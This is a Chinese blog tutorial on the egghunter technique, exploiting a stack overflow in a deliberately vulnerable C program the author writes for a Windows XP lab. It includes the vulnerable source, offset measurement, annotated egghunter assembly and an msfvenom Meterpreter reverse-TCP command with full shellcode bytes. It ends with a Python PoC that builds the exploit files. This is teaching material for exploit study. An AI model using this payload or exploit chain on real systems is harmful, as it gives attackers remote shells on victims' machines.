<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="egghunter,vulplayer,溢出,">










<meta name="description" content="egghunter取名于“复活节彩蛋”，意为人们在复活节的时候去各个地方寻找有颜色的彩蛋。简单来说，就是利用一小段代码寻找一大段shellcode的过程。原因是可利用的栈空间太小，虽然可以控制跳转，但是不足以放下全部的shellcode。所以我们把这一段小空间装入寻找程序（hunter），而把大的shellcode放到后面的地址空间中，头部放上特征以供查找（egg）。hunter在全空间寻找这段e">
<meta name="keywords" content="egghunter,vulplayer,溢出">
<meta property="og:type" content="article">
<meta property="og:title" content="egghunter原理与实战">
<meta property="og:url" content="http://yoursite.com/2020/05/07/egghunter原理与实战/index.html">
<meta property="og:site_name" content="pukr&#39;s BLOG">
<meta property="og:description" content="egghunter取名于“复活节彩蛋”，意为人们在复活节的时候去各个地方寻找有颜色的彩蛋。简单来说，就是利用一小段代码寻找一大段shellcode的过程。原因是可利用的栈空间太小，虽然可以控制跳转，但是不足以放下全部的shellcode。所以我们把这一段小空间装入寻找程序（hunter），而把大的shellcode放到后面的地址空间中，头部放上特征以供查找（egg）。hunter在全空间寻找这段e">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/原理.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/offset.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/坑.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/寻蛋汇编.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/原理.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/mona.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/jmpegg.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/坑-1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/坑-2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/shell.png">
<meta property="og:updated_time" content="2022-04-24T00:08:29.003Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="egghunter原理与实战">
<meta name="twitter:description" content="egghunter取名于“复活节彩蛋”，意为人们在复活节的时候去各个地方寻找有颜色的彩蛋。简单来说，就是利用一小段代码寻找一大段shellcode的过程。原因是可利用的栈空间太小，虽然可以控制跳转，但是不足以放下全部的shellcode。所以我们把这一段小空间装入寻找程序（hunter），而把大的shellcode放到后面的地址空间中，头部放上特征以供查找（egg）。hunter在全空间寻找这段e">
<meta name="twitter:image" content="http://yoursite.com/2020/05/07/egghunter原理与实战/原理.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/05/07/egghunter原理与实战/">





  <title>egghunter原理与实战 | pukr's BLOG</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">pukr's BLOG</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">人类的悲欢并不相通</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/05/07/egghunter原理与实战/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="尘林">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/zql.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="pukr's BLOG">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">egghunter原理与实战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-05-07T14:34:45+08:00">
                2020-05-07
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>egghunter取名于“复活节彩蛋”，意为人们在复活节的时候去各个地方寻找有颜色的彩蛋。简单来说，就是利用一小段代码寻找一大段shellcode的过程。原因是可利用的栈空间太小，虽然可以控制跳转，但是不足以放下全部的shellcode。所以我们把这一段小空间装入寻找程序（hunter），而把大的shellcode放到后面的地址空间中，头部放上特征以供查找（egg）。hunter在全空间寻找这段egg。人们按规律搜索彩蛋的过程就是hunter；彩蛋就是egg。这个技术最早在2004年由skape的文章《Safely Searching Process Virtual Address Space》提出。</p>
<p>egghunter技术主要解决的是溢出位置无法容纳大的shellcode的问题，而容纳大的shellcode的地方一般不会有溢出。</p>
<p>名字十分有趣，过程也很有趣。</p>
<p>我们在kali中生成shellcode与所需文件，放到xp的VC++6.0下编译运行，metasploit接收反弹。<br><a id="more"></a></p>
<h1 id="准备"><a href="#准备" class="headerlink" title="准备"></a>准备</h1><p>1.OllyDBG<br>2.VC++6.0<br>3.immunity debugger<br>3.windows xp<br>4.kali</p>
<h1 id="关键点"><a href="#关键点" class="headerlink" title="关键点"></a>关键点</h1><p>首先我们需要一段寻蛋程序放在预定的位置，可以利用msf-egghunter生成。</p>
<p>其次我们最终可执行的shellcode必须存在于内存空间的某个位置，也就是我们有存放大段shellcode的地方，只是我们不知道在哪里。当然也可以继续拆分，那么我们就需要构造ROP链多次在内存空间中跳转。<br>听起来很麻烦，但是“大道五十，天衍四十九”，万事不得圆满，漏洞往往出现在这一线生机中，抓住才有意义。</p>
<p>最后，我们还需要一些控制跳转的地址，如jmp esp、call、push/ret等，这个可利用mona在进程中寻找。</p>
<h1 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h1><p>这个例子演示的是egghunter技术，在xp下编译运行。<br>在win7下也可以运行，只不过需要关闭DEP，GS，ALSR和SafeSEH。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">"stdafx.h"</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> filename1[] = <span class="string">"c:\\1.txt"</span>;</span><br><span class="line"><span class="keyword">char</span> filename2[] = <span class="string">"c:\\2.txt"</span>;</span><br><span class="line"><span class="keyword">char</span> tempbuf[<span class="number">0x4000</span>];</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">func</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">char</span> buf1[<span class="number">0x30</span>];</span><br><span class="line">	<span class="keyword">char</span> buf2[<span class="number">0x40</span>];</span><br><span class="line"></span><br><span class="line">	HANDLE hFile;</span><br><span class="line">	DWORD filelen, readlen;</span><br><span class="line">	readlen = <span class="number">0x200</span>;</span><br><span class="line">	<span class="built_in">memset</span>(buf1, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf1));</span><br><span class="line">	<span class="built_in">memset</span>(buf2, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf2));</span><br><span class="line">	hFile = CreateFileA(filename1, GENERIC_READ, FILE_SHARE_READ, <span class="literal">NULL</span>, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, <span class="literal">NULL</span>);</span><br><span class="line">	<span class="keyword">if</span> (hFile == INVALID_HANDLE_VALUE)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"Open file failed!"</span>);</span><br><span class="line">		<span class="keyword">return</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	filelen = GetFileSize(hFile, <span class="literal">NULL</span>);</span><br><span class="line">	ReadFile(hFile, tempbuf, filelen, &amp;readlen, <span class="literal">NULL</span>);</span><br><span class="line">	CloseHandle(hFile);</span><br><span class="line"></span><br><span class="line">	hFile = CreateFileA(filename2, GENERIC_READ, FILE_SHARE_READ, <span class="literal">NULL</span>, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, <span class="literal">NULL</span>);</span><br><span class="line">	<span class="keyword">if</span> (hFile == INVALID_HANDLE_VALUE)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"Open file failed!"</span>);</span><br><span class="line">		<span class="keyword">return</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	filelen = GetFileSize(hFile, <span class="literal">NULL</span>);</span><br><span class="line">	ReadFile(hFile, buf1, filelen, &amp;readlen, <span class="literal">NULL</span>);</span><br><span class="line">	CloseHandle(hFile);</span><br><span class="line">	<span class="built_in">strcpy</span>(buf2, buf1);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"Text-length:%d\r\n"</span>, readlen);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"Text:'%s'\r\n"</span>, buf2);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> a[<span class="number">4000</span>];</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"the code begin!\n"</span>);</span><br><span class="line">	func();</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"the code end!\n"</span>);</span><br><span class="line">	getchar();</span><br><span class="line">	<span class="keyword">if</span> (<span class="number">1</span>&lt;<span class="number">0</span>)</span><br><span class="line">		__asm</span><br><span class="line">	&#123;</span><br><span class="line">		jmp esp</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在这段代码中，我们读取字节流的方式是文件操作。我们定义了两个较小的内存空间，又在静态存储区定义了一个较大的内存空间。1.txt载入的即我们利用msf生成的shellcode，2.txt为msf-egghunter生成的寻蛋程序。</p>
<p>hFile创建了文件句柄，ReadFile读取到内存中。在fun函数结束时利用jmp esp控制跳转，短跳到寻蛋程序进行搜索，搜索后跳转到shellcode执行。<br><img src="/2020/05/07/egghunter原理与实战/原理.png" alt></p>
<p>明白了原理，接下来测试一下偏移量：</p>
<p>先利用msf-pattern_create生成一段字符串来测量偏移量。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@kali430:~# msf-pattern_create -l 200</span><br><span class="line">Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag</span><br></pre></td></tr></table></figure></p>
<p>保存在xp的C:\\2.txt文件中。</p>
<p>1.txt可以先随便填充点什么，测试阶段不碍事。</p>
<p>到OD里调试观察到：<br><img src="/2020/05/07/egghunter原理与实战/offset.png" alt></p>
<p>确定偏移：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@kali430:~# msf-pattern_offset -q 8Ad9</span><br><span class="line">[*] Exact match at offset 116</span><br></pre></td></tr></table></figure></p>
<p><img src="/2020/05/07/egghunter原理与实战/坑.png" alt><br>上图是个我掉进去的小坑，后面会解释到。</p>
<p>既然已经明白了原理并确定了偏移量，那么接下来就是写poc了。</p>
<h1 id="python写出poc"><a href="#python写出poc" class="headerlink" title="python写出poc"></a>python写出poc</h1><p>首先利用msf-egghunter生成寻蛋代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">root@kali430:~# msf-egghunter -p windows -f python  -e w00t -v eggfinder</span><br><span class="line">eggfinder =  b&quot;&quot;</span><br><span class="line">eggfinder += b&quot;\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd&quot;</span><br><span class="line">eggfinder += b&quot;\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74&quot;</span><br><span class="line">eggfinder += b&quot;\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7&quot;</span><br></pre></td></tr></table></figure></p>
<p>我们把这段代码放到OD里看一看：<br><img src="/2020/05/07/egghunter原理与实战/寻蛋汇编.png" alt></p>
<p>实际上在windows平台下主要有两种方法搜索进程地址空间。第一种是利用了windows的一个特殊功能：结构化异常处理。即经典的SEH栈溢出，SEH栈溢出不在本文讨论范围内，但是和egghunter结合起来也是一件利器。第二种是用系统调用。即本文中的方法。系统调用中也有很多可用函数，后面会说到。</p>
<p>我们利用<code>AccessCheckAndAuditAlarm</code>函数进行内存搜索。进入系统调用也有两种方式，一种是<code>int 2e</code>，一种是<code>sysenter</code>。这里我们选用<code>int 2e</code>使程序从ring3（运行应用程序，user层）进入ring0（运行内核程序，kernel层）运行API函数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">66:81CA FF0F    or      dx, 0FFF		;获取内存页面的最后一个地址</span><br><span class="line">42              inc     edx			;循环遍历计数</span><br><span class="line">52              push    edx			;edx入栈，保存栈中当前地址</span><br><span class="line">6A 02           push    2			;0x2是 AccessCheckAndAuditAlarm的系统调用号。</span><br><span class="line">58              pop     eax			;eax赋值为2。windows在系统调用方面和linux类似，也是将调用号保存在eax中。</span><br><span class="line">CD 2E           int     2E			;进入内核调用函数</span><br><span class="line">3C 05           cmp     al, 5			;检查是否发生访问冲突</span><br><span class="line">5A              pop     edx			;恢复edx</span><br><span class="line">74 EF           je      short 0012EF64		;这个地址是寻蛋程序的开头。跳转到开头or dx, 0FFF</span><br><span class="line">B8 77303074     mov     eax, 74303077		;&apos;w00t&apos;传给eax</span><br><span class="line">89D7            mov     edi, edx		;将edi设为当前地址指针</span><br><span class="line">AF              scas    dword ptr es:[edi]	;把AL或AX的内容与目标串作比较,比较结果反映在标志位</span><br><span class="line">75 EA           jnz     short 0012EF69		;不相等就回到inc edx继续下一轮比较</span><br><span class="line">AF              scas    dword ptr es:[edi]	;匹配成功则进行第二次比较，下面说原因</span><br><span class="line">75 E7           jnz     short 0012EF69		;</span><br><span class="line">FFE7            jmp     edi			;跳转到shellcode</span><br></pre></td></tr></table></figure>
<p>为什么将shellcode前的标志设置为4字节重复两次呢，因为我们同样在hunter寻蛋程序中放入了这个四字节标志才知道我们要搜索的目标，那么我们在搜索的时候就有可能会将hunter寻蛋程序中的标志作为目的地。所以重复两次，以免产生错误。</p>
<p>实际上我们有不少方法编写hunter寻蛋程序，比如另一个应用广泛的安全搜索内存空间API函数<code>NtDisplayString</code>，系统调用号是0x43，把<code>6A 02</code>更改为<code>6A 43</code>即可。<br>或者使用<code>IsBadReadPtr</code>函数与SEH。但是随着safeSEH的应用，使用SEH算法时还需要考虑绕过safeSEH的限制。有兴趣的筒子可以在下方链接中查看具体细节，大佬的译文。<br><a href="https://bbs.pediy.com/thread-116190.htm" target="_blank" rel="noopener">egg hunting</a></p>
<p>再看一下原理图：<br><img src="/2020/05/07/egghunter原理与实战/原理.png" alt></p>
<p>在immunity debugger里用mona寻找一个可利用的<code>jmp esp</code>。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">!mona jmp -r esp</span><br></pre></td></tr></table></figure></p>
<p><img src="/2020/05/07/egghunter原理与实战/mona.png" alt><br>选择kernel32.dll中的0x7c86467b。</p>
<p>确定跳回到hunter寻蛋程序的偏移量：<br><img src="/2020/05/07/egghunter原理与实战/jmpegg.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root@kali430:~# msf-nasm_shell</span><br><span class="line">nasm &gt; jmp $-44</span><br><span class="line">00000000  EBD2              jmp short 0xffffffd4</span><br></pre></td></tr></table></figure>
<p>生成shellcode：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=5555 -b &apos;\x00&apos; -i 3 -f python</span><br></pre></td></tr></table></figure></p>
<p>python代码：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> struct</span><br><span class="line">file_name1 = <span class="string">"1.txt"</span></span><br><span class="line">file_name2 = <span class="string">"2.txt"</span></span><br><span class="line">buf =  <span class="string">"w00tw00t"</span></span><br><span class="line">buf += <span class="string">b"\xd9\xc1\xbe\x5d\xe6\x14\x62\xd9\x74\x24\xf4\x58\x33"</span></span><br><span class="line">buf += <span class="string">b"\xc9\xb1\x63\x31\x70\x1a\x83\xe8\xfc\x03\x70\x16\xe2"</span></span><br><span class="line">buf += <span class="string">b"\xa8\x59\xc6\xa1\x17\xdf\x3d\xf7\x4e\x6b\xe6\x0c\x2d"</span></span><br><span class="line">buf += <span class="string">b"\xbd\x2f\x5d\x90\x8c\xd2\x8c\xa9\x02\xd0\xb2\x02\x11"</span></span><br><span class="line">buf += <span class="string">b"\x8e\x39\xc9\xa7\x4e\xbf\xfb\x3a\x03\x99\xc3\x91\x63"</span></span><br><span class="line">buf += <span class="string">b"\x98\xda\xc6\xb5\xfb\xc4\x6a\x44\xf2\x05\x4a\x76\x59"</span></span><br><span class="line">buf += <span class="string">b"\x65\xad\x85\x61\xa2\x35\x43\xc9\x76\x35\x21\xcb\x5e"</span></span><br><span class="line">buf += <span class="string">b"\x31\x1f\x22\x90\x23\x3a\xde\x20\xe4\x4f\x82\xb9\x96"</span></span><br><span class="line">buf += <span class="string">b"\x14\x3f\x0a\xb0\x3f\xb3\x7c\xa6\x87\x15\x0d\xb0\xb0"</span></span><br><span class="line">buf += <span class="string">b"\x55\x86\x2f\xb2\xb2\x94\x7d\x95\x90\xde\xa7\x6c\xd0"</span></span><br><span class="line">buf += <span class="string">b"\xd9\xc5\xcd\xf5\xdf\xa3\xa0\x17\x9e\x41\x47\x5b\xf7"</span></span><br><span class="line">buf += <span class="string">b"\xb9\xf8\x55\x23\x73\x4f\xcf\x01\xbc\x55\x65\x5d\x04"</span></span><br><span class="line">buf += <span class="string">b"\x76\x0f\x2a\x59\xfc\x9f\xe7\x10\x86\x93\x4e\x55\x8a"</span></span><br><span class="line">buf += <span class="string">b"\x44\x7c\x9e\x18\x90\xaa\xcd\x67\x10\x2e\x8d\x4f\x23"</span></span><br><span class="line">buf += <span class="string">b"\x15\xa8\xee\xba\x25\x39\x62\x61\x7c\xfd\xd9\xbd\x54"</span></span><br><span class="line">buf += <span class="string">b"\x81\xb6\x35\x92\x29\x05\x5b\xeb\x84\x93\xe5\x57\xad"</span></span><br><span class="line">buf += <span class="string">b"\xfe\xd5\x83\xba\x41\xc7\xa5\xf2\x9a\x0d\xe9\xf1\x93"</span></span><br><span class="line">buf += <span class="string">b"\xca\x7b\x2e\x76\x6c\x5d\x3e\x36\xd8\x0b\xd3\xfd\xc4"</span></span><br><span class="line">buf += <span class="string">b"\x0c\x3c\x3d\xff\xe8\x0e\x63\x80\xd5\xf0\x98\x0d\x09"</span></span><br><span class="line">buf += <span class="string">b"\x92\x3b\x3e\xf9\x1a\x20\x3c\x3f\x74\x4a\x60\xb3\x4f"</span></span><br><span class="line">buf += <span class="string">b"\x23\x7e\xb3\x1b\xb7\x0f\x9e\x76\x7d\xde\xd8\x7a\x3f"</span></span><br><span class="line">buf += <span class="string">b"\xe1\x5f\xb0\xea\xdb\x52\x7b\x46\x04\x7c\xdb\x27\xe5"</span></span><br><span class="line">buf += <span class="string">b"\x11\x11\xf5\x23\xa2\x28\x1d\xfe\xae\xd2\x7d\xad\x61"</span></span><br><span class="line">buf += <span class="string">b"\xfa\x97\x3d\x44\x0f\x02\x54\x0b\xc6\xd5\x5e\x36\x86"</span></span><br><span class="line">buf += <span class="string">b"\x4f\xec\x22\x8a\x51\x9b\xb1\xd5\xc3\x23\xca\x61\xcd"</span></span><br><span class="line">buf += <span class="string">b"\xbb\xe7\x48\x94\xe9\x3c\x0d\x0b\x94\xe9\xae\x63\xeb"</span></span><br><span class="line">buf += <span class="string">b"\xb6\x92\x65\xf2\xd0\x92\xe1\xe0\x8e\x4b\xa5\x96\xe0"</span></span><br><span class="line">buf += <span class="string">b"\xe2\x8d\xa9\x9c\x16\x4e\x51\x11\x69\xd7\xdb\xc9\xe4"</span></span><br><span class="line">buf += <span class="string">b"\x1a\xb7\xd6\x4c\xc2\xab\xc2\x4e\x02\xcd\x1b\x3c\x5c"</span></span><br><span class="line">buf += <span class="string">b"\x05\x07\xd9\x1a\x42\xcc\xfa\xee\x0d\x65\x26\xa2\x30"</span></span><br><span class="line">buf += <span class="string">b"\x16\x07\x5d\x27\xcc\x0f\x23\x01\xea\x9f\x2d\x03\x19"</span></span><br><span class="line">buf += <span class="string">b"\x78\x2c\x9f\x0c\x6e\x7d\x99\x7e\xea\x23\xc4\x94\x81"</span></span><br><span class="line">buf += <span class="string">b"\x48\x55\x58\xe2\x9d\x61"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">eggfinder =  <span class="string">b""</span></span><br><span class="line">eggfinder += <span class="string">b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"</span></span><br><span class="line">eggfinder += <span class="string">b"\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74"</span></span><br><span class="line">eggfinder += <span class="string">b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"</span></span><br><span class="line"></span><br><span class="line">payload1=buf</span><br><span class="line">poc_file = open(file_name1,<span class="string">"w"</span>)</span><br><span class="line">poc_file.write(payload1)</span><br><span class="line">poc_file.close()</span><br><span class="line"></span><br><span class="line">offset =<span class="number">116</span></span><br><span class="line"><span class="comment">#7c86467b</span></span><br><span class="line">jmpesp=<span class="string">b"\x7b\x46\x86\x7c"</span></span><br><span class="line">jmpegg=<span class="string">b"\xeb\xd2\x90\x90"</span></span><br><span class="line">nops = <span class="string">"\x90"</span>*(offset-len(eggfinder)<span class="number">-8</span>)+eggfinder+<span class="string">"\x90"</span>*<span class="number">8</span>+jmpesp+jmpegg</span><br><span class="line"></span><br><span class="line">payload2 = nops</span><br><span class="line">poc_file = open(file_name2,<span class="string">"w"</span>)</span><br><span class="line">poc_file.write(payload2)</span><br><span class="line">poc_file.close()</span><br></pre></td></tr></table></figure></p>
